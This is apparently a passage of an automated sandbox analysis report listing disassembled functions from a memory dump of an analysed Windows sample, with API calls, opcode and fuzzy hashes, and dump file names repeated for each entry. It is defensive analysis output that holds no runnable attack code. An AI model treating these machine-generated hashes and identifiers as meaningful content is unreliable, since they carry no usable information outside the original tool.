                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3394109436-0
                                                                                                                            • Opcode ID: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                            • Instruction ID: cf37d5954fa70898b434e0d26c6706b10c8171271484cbeb9454a15f2979c00d
                                                                                                                            • Opcode Fuzzy Hash: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                            • Instruction Fuzzy Hash: 58E19B74E05269CFEB64CF68C984BA9BBB1BB48300F1485EAD849A7381D7349E85CF15
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409128 Relevance: 5.3, APIs: 4, Instructions: 253COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                            • Instruction ID: 6ef1666d030b3683f745449ade9432935f6c1ed2423b4b2fea7fa3c30e0d11e8
                                                                                                                            • Opcode Fuzzy Hash: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                            • Instruction Fuzzy Hash: DFD169B4D05269CFEB64CF68C984B99BBB1BB48300F1081EAD84DA7391D734AE85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409285 Relevance: 5.2, APIs: 4, Instructions: 248COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                            • Instruction ID: 98c6a34e011fea02c5fd1f307661bc496968a447f3de359247ec3e7382062383
                                                                                                                            • Opcode Fuzzy Hash: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                            • Instruction Fuzzy Hash: 54D178B4D052698FEB64CF68C980B99BBB1BB48300F1481EAD84DA7381D734AE85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040925A Relevance: 5.2, APIs: 4, Instructions: 247COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                            • Instruction ID: bea8f09e258bf7577ce88e7167e750fa30ab14cfac5afba0003b10e989aa1f51
                                                                                                                            • Opcode Fuzzy Hash: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                            • Instruction Fuzzy Hash: 9FD169B4D05269CFEB64CF68C984B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409157 Relevance: 5.2, APIs: 4, Instructions: 244COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                            • Instruction ID: cf999dc1e13fdb9e3b794afb24179b6ab6f8fffdfeb4e36a57addd35a861b0c2
                                                                                                                            • Opcode Fuzzy Hash: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                            • Instruction Fuzzy Hash: DCC17A74D05269CFEB64CF68C980B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004096F9 Relevance: 5.2, APIs: 4, Instructions: 230COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                            • Instruction ID: a16c7d6d65317efe9c57d887f34a02eee03e71a6b958f13de8b6000bf5c2667a
                                                                                                                            • Opcode Fuzzy Hash: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                            • Instruction Fuzzy Hash: E8C17BB4D05269CFDB64CF68C984B99BBB1BB48300F1081EAD84DA7381D734AE85CF15
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402E4B Relevance: 4.6, APIs: 3, Instructions: 89registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1818849710-0
                                                                                                                            • Opcode ID: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
                                                                                                                            • Instruction ID: aa20071d88737d2ca076d9582247293cc4c89cd0404862d20b3ad10084441af9
                                                                                                                            • Opcode Fuzzy Hash: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
                                                                                                                            • Instruction Fuzzy Hash: 813150B09083018FD710EF25C94835ABBF4FB84315F10886EF489A7391D7799A89DF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403AE9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID: <@
                                                                                                                            • API String ID: 2738559852-4072043054
                                                                                                                            • Opcode ID: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                            • Instruction ID: af84ff8d7bbf5bb76e19132ef8cd2b24e5e30c6edf1d6b1d64d2a00a1082e161
                                                                                                                            • Opcode Fuzzy Hash: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                            • Instruction Fuzzy Hash: 1EF0ACB1904309AFC700EF69C58454EBBF4AB48354F408839E85993251E734E604CF56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403141 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindCloseChangeNotification.KERNEL32 ref: 00403159
                                                                                                                            Strings
                                                                                                                            • 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 00403141
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                            • String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
                                                                                                                            • API String ID: 2591292051-244690609
                                                                                                                            • Opcode ID: 7220984d86149b75493436dbbda63972d97fcd78ed879eff71d07d38dd4f9017
                                                                                                                            • Instruction ID: cae25ad1085ea1b7b33e0ee8e1dfa0938857f6c35aa13dd2a3c4ee0daf51729b
                                                                                                                            • Opcode Fuzzy Hash: 7220984d86149b75493436dbbda63972d97fcd78ed879eff71d07d38dd4f9017
                                                                                                                            • Instruction Fuzzy Hash: 1FC012B180D7519FC3016F3068494657FB06E11305756487EF8C1A6093D73845048657
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040322E Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ReadFile.KERNEL32 ref: 00403292
                                                                                                                            • SetFilePointer.KERNEL32 ref: 00403316
                                                                                                                              • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$PointerReadwsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2027716870-0
                                                                                                                            • Opcode ID: 2a1d3a7d486c6b86bccdea9d2ad81ee3c8c98c4cef3a960bb8e5e7f735770045
                                                                                                                            • Instruction ID: 8e5637f0c6afa0013300979c193a8b9475ce08824852a7f6775797156de60d7d
                                                                                                                            • Opcode Fuzzy Hash: 2a1d3a7d486c6b86bccdea9d2ad81ee3c8c98c4cef3a960bb8e5e7f735770045
                                                                                                                            • Instruction Fuzzy Hash: CC31B2719082549FD721DF28C8457EABBF5BB41305F4481BFE88967381CB385A85CF4A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407779 Relevance: 3.0, APIs: 2, Instructions: 29processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3712363035-0
                                                                                                                            • Opcode ID: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
                                                                                                                            • Instruction ID: e526153969689a3bb24f951f69113ce00b5f3314808de7d96251afda99080b29
                                                                                                                            • Opcode Fuzzy Hash: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
                                                                                                                            • Instruction Fuzzy Hash: 9F01BDB4A083058FE700DF65C55874BBBF4BB88348F40892CE984AB380D7B9D5498BDA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407A78 Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                            • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 415043291-0
                                                                                                                            • Opcode ID: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                            • Instruction ID: df9a40891ed5a6603638aa450cb2a5da2b508cd079f162d5418714098e0b767a
                                                                                                                            • Opcode Fuzzy Hash: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                            • Instruction Fuzzy Hash: E2F0D4B06083059FC700EF29D48874EBBF4BF88354F50892CE89987391D374D9848FA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407A46 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(?,00000000,00000000), ref: 00407A53
                                                                                                                            • SetFileAttributesA.KERNEL32(?,?,00000000,00000000), ref: 00407A69
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
